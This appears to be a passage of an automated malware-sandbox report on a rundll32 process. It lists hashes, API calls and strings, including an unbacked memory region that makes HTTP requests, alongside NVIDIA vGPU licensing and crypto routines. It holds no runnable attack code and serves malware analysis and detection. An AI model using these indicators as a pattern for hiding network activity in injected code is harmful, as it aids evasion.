                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 3b9193fbf2ab34594eed76214b4d4e304845222aad74228beea63719356c42be
                                                                    • Instruction ID: e558cecce3160fd316934fc8d21d8cf4a7efcc9ca70bf34b0d2296e82cd1a381
                                                                    • Opcode Fuzzy Hash: 3b9193fbf2ab34594eed76214b4d4e304845222aad74228beea63719356c42be
                                                                    • Instruction Fuzzy Hash: B0E0EC35A19A81D6EA10EB10E86202AB3B0FB89784F810035E68D42B15DFBCE525CB14

                                                                    Control-flow Graph

                                                                    • Function at 1ceafc717b0: internal calls only, no named API calls
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c3a27eaabef9b11607e5348644df54255de6d118b201e6426a1c13144a620278
                                                                    • Instruction ID: 84baaf2e9af7adc6055d8f533623fc8378c05d63569cc28c9334eefac1e44ae3
                                                                    • Opcode Fuzzy Hash: c3a27eaabef9b11607e5348644df54255de6d118b201e6426a1c13144a620278
                                                                    • Instruction Fuzzy Hash: 22C10230158A499FFB54EF29C885BEAB7E1FF59380F500269E48AC32E2EB70D941C745

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                    • Instruction ID: 38fd14a913e8f20fcf089d403b48c49011da93193835ed048e1d463ee9c6400f
                                                                    • Opcode Fuzzy Hash: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                    • Instruction Fuzzy Hash: F8414CB151CB489FE7B49F09A8427EAB7E0FB89720F00492FD5C983255D731A8428BC7

                                                                    Control-flow Graph

                                                                    • Function at 1ceafc77830: calls InternetOpenW, InternetConnectW, HttpOpenRequestW, HttpSendRequestA, InternetQueryDataAvailable, RtlReAllocateHeap, InternetCloseHandle
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$HeapHttpOpenRequest$AllocateAvailableCloseConnectDataFreeHandleQuerySend
                                                                    • String ID:
                                                                    • API String ID: 3737532752-0
                                                                    • Opcode ID: d9666d6ee9cc84210a5d48bfb43a1b93f204f5f1cab97c350c418fdf5ba67fc7
                                                                    • Instruction ID: 71fd8c2df091d8ef0b767aaa01534618b0b3951d557167aa36d88480abfed1a2
                                                                    • Opcode Fuzzy Hash: d9666d6ee9cc84210a5d48bfb43a1b93f204f5f1cab97c350c418fdf5ba67fc7
                                                                    • Instruction Fuzzy Hash: 84B1E230618A099FFB54EF19D859BEEB7E5FF98380F044569A84AC32D1DF74D8018786

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterPerformanceQuery$CounterFrequencyInit_thread_footerLeave
                                                                    • String ID: )9
                                                                    • API String ID: 2428000217-1805338887
                                                                    • Opcode ID: 2ba064750abb0480fc47005e460bd415229348ce2235b756271b4d4ff3ee25c1
                                                                    • Instruction ID: 3d2573f3cf94dcffb505023f5a624463579426db3ea2f961382dc276a1de9ae7
                                                                    • Opcode Fuzzy Hash: 2ba064750abb0480fc47005e460bd415229348ce2235b756271b4d4ff3ee25c1
                                                                    • Instruction Fuzzy Hash: 7801923192AA42F2EA00DB24F8410A47370EB523D4F800236D26E425A1FF3CA9A98778

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterProcess$CurrentInit_thread_footerLeaveTimes
                                                                    • String ID:
                                                                    • API String ID: 816428697-0
                                                                    • Opcode ID: f5dcc11f3405eaa559cfcd6a0ccef3154b8c7c602b6e6a17d5af2eea432bee2d
                                                                    • Instruction ID: e63fa713357b009c52feebf46956ab30194ea0b303b197b94da8cd94abe00052
                                                                    • Opcode Fuzzy Hash: f5dcc11f3405eaa559cfcd6a0ccef3154b8c7c602b6e6a17d5af2eea432bee2d
                                                                    • Instruction Fuzzy Hash: 5E110D71A06B42EAEB10CF64E8410A93364FB447E8F400635EA7E436A4EF3CE565C368

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: enableSRS1364
                                                                    • API String ID: 1323251999-1359322883
                                                                    • Opcode ID: 01bd3773f0eb2a558a1897b6c9c6b57b574b912d968410f7a26ad8025ae356bc
                                                                    • Instruction ID: e1be9d89d3ebb6545b66669d74ac7e057a4ad97949ff392f79eff8f41aa576e6
                                                                    • Opcode Fuzzy Hash: 01bd3773f0eb2a558a1897b6c9c6b57b574b912d968410f7a26ad8025ae356bc
                                                                    • Instruction Fuzzy Hash: 6E318E32B17A45A1EE18CB29E0902392360EB58FE4F545736DA7E077D4DF3CE46A8314

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMutex
                                                                    • String ID:
                                                                    • API String ID: 1964310414-0
                                                                    • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction ID: 2da458664882f895d24a4c5e03c32b85401c7afa55af30c21be25fca94b04bf3
                                                                    • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction Fuzzy Hash: ECE11E71418A098FE755EF14E895BE6B7F4F768380F20067BE84AC31A1DB39D245CB86

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 330 1ceafc9b4e0-1ceafc9b4ee 331 1ceafc9b4f0-1ceafc9b505 330->331 332 1ceafc9b523-1ceafc9b52f 330->332 331->332 334 1ceafc9b507-1ceafc9b51d call 1ceafc94ce0 RtlFreeHeap 331->334 334->332
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction ID: 099121f40e541e3b6702279eadf012a57d74fd55f10622f2256a10ed4ba17106
                                                                    • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction Fuzzy Hash: 13F01C30750E089FFB58E7BAACC8BA537E2FB9C345B448055A405C7195DB38D941C741

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 340 7ff8a8d02dea-7ff8a8d02df1 341 7ff8a8d02df8-7ff8a8d02e08 call 7ff8a8d966a0 340->341
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterInit_thread_footerLeave
                                                                    • String ID:
                                                                    • API String ID: 3960375172-0
                                                                    • Opcode ID: c5947d29cb0026eff81cbd50f8bf128efe6ae772932f805a0bfbed681eda9c15
                                                                    • Instruction ID: 3f22104bd1061efcf6840a3e810c571e5bb314fa72e729f502b6fb11376ccfac
                                                                    • Opcode Fuzzy Hash: c5947d29cb0026eff81cbd50f8bf128efe6ae772932f805a0bfbed681eda9c15
                                                                    • Instruction Fuzzy Hash: 1AC04C31D2EB02F2F9009B14E8410613370EF503C4F8000B1D51D02271EF3CA1758378

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF8A8DDCE3D,?,?,00000000,00007FF8A8DCD4E3,?,?,?,00007FF8A8DDC6EF,?,?,?,00007FF8A8DDC5E5), ref: 00007FF8A8DDCDFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 6db678ebbd684dba6e48db42fee9dfd296a3721e1ba496f89583ae119ae3c92c
                                                                    • Instruction ID: 2408027ff5b57324578db9d0c93d9f7195c5e0c440f8d87b9e37c8a82a6359b4
                                                                    • Opcode Fuzzy Hash: 6db678ebbd684dba6e48db42fee9dfd296a3721e1ba496f89583ae119ae3c92c
                                                                    • Instruction Fuzzy Hash: 1FF08C91F4B202A2FE74277258412791584EF847E0F480634DD3E873D1EF2CA4589AB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000003.2086199598.000001CEAFDF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CEAFDF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_3_1ceafdf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction ID: 079f6d74a994747e646a627d660078c1ea3d4344aa2d2c018cf358a967e1ff30
                                                                    • Opcode Fuzzy Hash: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction Fuzzy Hash: 9401F431259A2A0FFB99E76DB8C0BE677C2F7D8330F588065D84AC72C6E924C9414280
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D73D70: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D73E80
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D74809
                                                                      • Part of subcall function 00007FF8A8D2E228: _Init_thread_footer.LIBCMT ref: 00007FF8A8D2E2EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$Init_thread_footer
                                                                    • String ID: "auth","port":$"d_name":"$"fulfillment_class_ref_list":[$"jti":"$"lease","port":$"node_url_list":[$"scope_ref_list":[$"svc_port_set_list":[$"url":"$"url_qr":"$CLS$Could not fetch the service instance type$Could not fetch value for JWT identifier of the client configuration token$Could not fetch value for authentication server port$Could not fetch value for fulfillment class reference token$Could not fetch value for lease server port$Could not fetch value for node URL$Could not fetch value for node URL list$Could not fetch value for quick release server URL$Could not fetch value for scope reference token$Could not fetch value for server port list$Failed to extract public key$GridCommonUtils.cpp$Invalid client configuration token - signature validation failed$Scope reference token is not configured$\Program Files\NVIDIA Corporation\vGPU Licensing\TrustedStorage$readConfigsFromClientConfigToken
                                                                    • API String ID: 2214013052-1828063398
                                                                    • Opcode ID: 153c3cf1d58fa7a3b0a371835e5b5f35038c49628ef033add85e9b502cf0b756
                                                                    • Instruction ID: 24333d93c52ea742623dba88bc993c9b45eb7e675d49076f518847e3dd70de31
                                                                    • Opcode Fuzzy Hash: 153c3cf1d58fa7a3b0a371835e5b5f35038c49628ef033add85e9b502cf0b756
                                                                    • Instruction Fuzzy Hash: BA828332A0AB82A5FB11DB64E8407ED77A5FB413C8F800135DA5D53AA9EF3CD509C764
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$AllocLocal$BinaryCryptInit_thread_footerString
                                                                    • String ID: Failed to allocate memory$Failed to compute hash on data$Failed to decode key$Failed to import public key (0x%x) - (%s)$Failed to parse key$Failed to verify signature (0x%x) - (%s)$GridCloudLicensingCryptoWindows.cpp$RSASHA256Verify$SHA256
                                                                    • API String ID: 2293525744-2498357658
                                                                    • Opcode ID: d8f3303b16c45953b6ca959b5d39dddd3bc90e4b27dcab49aaab03715e782f50
                                                                    • Instruction ID: 35900ab32127a13480c7fcf6719b0a2b20b66c080f7b65296aad32adde748b0c
                                                                    • Opcode Fuzzy Hash: d8f3303b16c45953b6ca959b5d39dddd3bc90e4b27dcab49aaab03715e782f50
                                                                    • Instruction Fuzzy Hash: 16620E32A0AB41EAEB10DB64E4402DE77B4FB84398F500136DA8D57B69EF3CE159CB54
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$Init$AllocString_com_issue_error$Init_thread_footer
                                                                    • String ID: ACELOG: Current NV WMI Brightness value: $ACELOG: ExecQuery failed: $ACELOG: Failed to Execute Method: $ACELOG: Failed to Get PathVariable: $ACELOG: Failed to Get Result: $ACELOG: Failed to Put Level: $ACELOG: Failed to Put inArg: $ACELOG: Failed to spawn output param instance: $ACELOG: PWM cycle value: $ACELOG: failed to get class object or method$Level$NvGetSetBrightnessLevel$NvWmiBrightness$Nvidia::UXDriver::Core::WmiBrightnessControl::GetSetBrightnessViaWmiEc$Nvidia::UXDriver::Core::WmiBrightnessControl::InitECBrightness$Result$Select * from NvWmiBrightness$WQL$WmiBrightnessControl.cpp$__PATH$inArg
                                                                    • API String ID: 4231649107-2978839865
                                                                    • Opcode ID: d5208c8926c0af4829b03ecfae45d7c4e745a46c4453201a44d50b0b1cc27df7
                                                                    • Instruction ID: 5d797905587a9a3116ef480ad3dd100fbd895377381269f96c5fb506b12063d5
                                                                    • Opcode Fuzzy Hash: d5208c8926c0af4829b03ecfae45d7c4e745a46c4453201a44d50b0b1cc27df7
                                                                    • Instruction Fuzzy Hash: E2926E36A0AB81A9EB50DF61E8401EE77B4FB487C8F500136DA9D57B58EF38D158C718
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Value$lstrcat$CriticalSectionWait$DeallocateEnterInit_thread_footerObjectSinglestd::_$EventLeaveMultipleObjectsReset_onexit
                                                                    • String ID: ClientConfigTokenPath$CurrentFeatureType$DCHUVen$EnableLicenseOnLogin$Exitting WaitControl()$Grid cloud license acquired$Grid cloud license state machine initialized$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::WaitControl$SOFTWARE\NVIDIA Corporation\Global\GridLicensing$SOFTWARE\NVIDIA Corporation\Global\GridSW$SYSTEM\CurrentControlSet\Services\nvlddmkm$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridLicensing$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW$Service is terminating, waitForMultipleObjects returned : $Starting WaitControl()$Unable to fetch licensed feature type from registry
                                                                    • API String ID: 2378871850-2296029946
                                                                    • Opcode ID: a80dcd66cee10d92e8e31574b34c8f824a1682cf19216faf37bb6f8f5497ab6c
                                                                    • Instruction ID: b09d9b93674b9a765a0184d0ee99cf04109ef15f2fb98837e7f4acc6f6a86412
                                                                    • Opcode Fuzzy Hash: a80dcd66cee10d92e8e31574b34c8f824a1682cf19216faf37bb6f8f5497ab6c
                                                                    • Instruction Fuzzy Hash: 41621E32A0AB82E9EB10DF60E8401E937B4FB44398F500136DA5D57B69EF3CD659C768
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$_invalid_parameter_noinfo_noreturn$Heap$Crypt$AllocFreeLibraryProcess$AlgorithmErrorExportFormatInit_thread_footerLastLoadLocalMessageOpenPropertyProvider
                                                                    • String ID: AES$ChainingMode$ChainingModeGCM$Failed to allocate memory$Failed to export symmetric key (0x%x) - (%s)$Failed to generate key (0x%x) - (%s)$Failed to get the size of object (0x%x) - (%s)$Failed to open algorithm handle (0x%x) - (%s)$Failed to set cryptographic properties (0x%x) - (%s)$GridCloudLicensingCryptoWindows.cpp$ObjectLength$OpaqueKeyBlob$generateSymmetricKey
                                                                    • API String ID: 2962806294-91064389
                                                                    • Opcode ID: 0751dc3b6b54d79f71330d7578975599d75caf2de5ae8520f0dbc996185db319
                                                                    • Instruction ID: c0719f40c6d51645ecf7d4b4e1493563fba0e5eee26e9deb60db9e3d99de5021
                                                                    • Opcode Fuzzy Hash: 0751dc3b6b54d79f71330d7578975599d75caf2de5ae8520f0dbc996185db319
                                                                    • Instruction Fuzzy Hash: 45420E32A09B42E9EB10DB60E4406DD77B8FB44398F900136DA8D53B69EF7CE259CB54
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibraryLoadLocal$ErrorLast$FileModuleName
                                                                    • String ID: \mfpmp.exe$cryptbase.dll$cryptnet.dll$devobj.dll$drvstore.dll$msasn1.dll$wldp.dll
                                                                    • API String ID: 2075666388-3852175644
                                                                    • Opcode ID: 5b3b243193d4b28ed12cc47018abf45ed49fbc8cec7d705be69abaea25e175cb
                                                                    • Instruction ID: ab862890c56d4a8aa6c55a0bfecdd67ee3878973e90dd5669defc96ce67b2d41
                                                                    • Opcode Fuzzy Hash: 5b3b243193d4b28ed12cc47018abf45ed49fbc8cec7d705be69abaea25e175cb
                                                                    • Instruction Fuzzy Hash: EF915B34A0FB43F2FBA0DB15A850175A2A0FF48BC4F554539C85E42660EFBDF9649A38
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
